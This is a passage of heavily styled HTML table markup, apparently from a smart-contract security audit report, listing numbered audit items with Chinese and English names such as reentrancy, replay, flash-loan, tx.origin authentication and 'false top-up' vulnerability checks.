normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">重入攻击审计(Reentrancy Attack Audit)</span></span></p></td><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">-</span></span></p></td></tr><tr><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">5</span></span></p></td><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">重放攻击审计(Replay Attack Audit)</span></span></p></td><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">-</span></span></p></td></tr><tr><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">6</span></span></p></td><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">闪电贷攻击审计(Flashloan Attack Audit)</span></span></p></td><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">-</span></span></p></td></tr><tr><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">7</span></span></p></td><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">竞争条件审计(Race Conditions Audit)</span></span></p></td><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">重排序攻击审计(Reordering Attack Audit)</span></span></p></td></tr><tr><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">8</span></span></p></td><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">权限漏洞审计(Permission Vulnerability Audit)</span></span></p></td><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">访问控制审计(Access Control Audit)</span></span></p></td></tr><tr><td rowspan="9"><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">9</span></span></p></td><td rowspan="9"><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">安全设计审计(Security Design Audit)</span></span></p></td><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">外部模块安全使用审计(External Module Safe Use Audit)</span></span></p></td></tr><tr><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">编译器版本安全审计(Compiler Version Security Audit)</span></span></p></td></tr><tr><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">硬编码地址安全审计(Hard-coded Address Security Audit)</span></span></p></td></tr><tr><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">Fallback 函数安全使用审计(Fallback Function Safe Use Audit)</span></span></p></td></tr><tr><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">显式编码安全审计(Explicit Encoding Security Audit)</span></span></p></td></tr><tr><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">函数返回值安全审计(Function Return Value Security Audit)</span></span></p></td></tr><tr><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">外部调用函数安全审计(External Call Function Security Audit)</span></span></p></td></tr><tr><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">区块数据依赖安全审计(Block data Dependence Security Audit)</span></span></p></td></tr><tr><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">tx.origin 认证安全审计(tx.origin Authentication Security Audit)</span></span></p></td></tr><tr><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">10</span></span></p></td><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">拒绝服务审计(Denial of Service Audit)</span></span></p></td><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">-</span></span></p></td></tr><tr><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">11</span></span></p></td><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">Gas 优化审计(Gas Optimization Audit)</span></span></p></td><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">-</span></span></p></td></tr><tr><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">12</span></span></p></td><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">设计逻辑审计(Design Logic Audit)</span></span></p></td><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">-</span></span></p></td></tr><tr><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">13</span></span></p></td><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">变量覆盖漏洞审计(Variable Coverage Vulnerability Audit)</span></span></p></td><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">-</span></span></p></td></tr><tr><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">14</span></span></p></td><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">&#34;假充值&#34;漏洞审计(&#34;False Top-up&#34; Vulnerability Audit)</span></span></p></td><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">-</span></span></p></td></tr><tr><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">15</span></span></p></td><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">作用域与声明审计(Scoping and Declarations Audit)</span></span></p></td><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">-</span></span></p></td></tr><tr><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">16</span></span></p></td><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">恶意事件日志审计(Malicious Event Log Audit)</span></span></p></td><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">-</span></span></p></td></tr><tr><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">17</span></span></p></td><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">算术精度偏差审计(Arithmetic Accuracy Deviation Audit)</span></span></p></td><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">-</span></span></p></td></tr><tr><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">18</span></span></p></td><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: 